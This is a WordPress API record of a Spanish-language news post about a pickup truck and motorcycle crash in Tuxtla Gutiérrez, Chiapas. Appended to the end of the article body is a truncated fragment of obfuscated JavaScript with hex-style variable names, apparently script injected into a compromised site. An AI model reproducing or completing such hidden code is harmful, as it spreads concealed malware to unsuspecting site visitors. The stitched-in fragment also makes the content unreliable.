{"id":17730,"date":"2024-09-09T04:36:46","date_gmt":"2024-09-09T04:36:46","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17730"},"modified":"2024-09-09T04:36:47","modified_gmt":"2024-09-09T04:36:47","slug":"motociclistas-y-camioneta-colisionan-en-la-patria-nueva","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17730","title":{"rendered":"Motociclistas y camioneta colisionan en la Patria Nueva"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"17731\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1725856436890-1024x576.jpg\" alt=\"\" class=\"wp-image-17731\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1725856436890-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1725856436890-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1725856436890-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1725856436890.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"17732\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1725856443841-1024x576.jpg\" alt=\"\" class=\"wp-image-17732\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1725856443841-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1725856443841-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1725856443841-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/FB_IMG_1725856443841.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 8 de septiembre del 2024. Tuxtla Guti\u00e9rrez. &#8211; Un fuerte choque ocurrido este domingo entre una camioneta Ford Lobo King Ranch y una motocicleta Italika de color rojo sobre la Avenida \u00c1lamo y S\u00e1ndalo dej\u00f3 da\u00f1os materiales.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando los ocupantes de la moto chopper iba con preferencia de Oriente a Poniente cuando la camioneta les cerr\u00f3 el paso.<\/p>\n\n\n\n<p>La camioneta se desplazaba de Sur a Norte, se pas\u00f3 la preferencia y caus\u00f3 la colisi\u00f3n.<\/p>\n\n\n\n<p>Por el golpe los motociclistas salieron volando y se estrellaron contra el pavimento.<\/p>\n\n\n\n<p>Al lugar arribaron param\u00e9dicos de Protecci\u00f3n Civil Municipal para atender a los lesionados siendo trasladado al Hospital G\u00f3mez Maza el conductor.<\/p>\n\n\n\n<p>Al no haber un acuerdo entre los involucrados, las unidades fueron trasladadas a un corral\u00f3n para deslindar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 8 de septiembre del 2024. Tuxtla Guti\u00e9rrez. &#8211; Un fuerte choque ocurrido este domingo entre una camioneta Ford Lobo King Ranch y una motocicleta Italika de color rojo sobre la Avenida \u00c1lamo y S\u00e1ndalo dej\u00f3 da\u00f1os materiales. Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando los ocupantes de la moto &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17732,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-17730","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17730","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17730"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17730\/revisions"}],"predecessor-version":[{"id":17733,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17730\/revisions\/17733"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17732"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17730"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17730"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17730"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}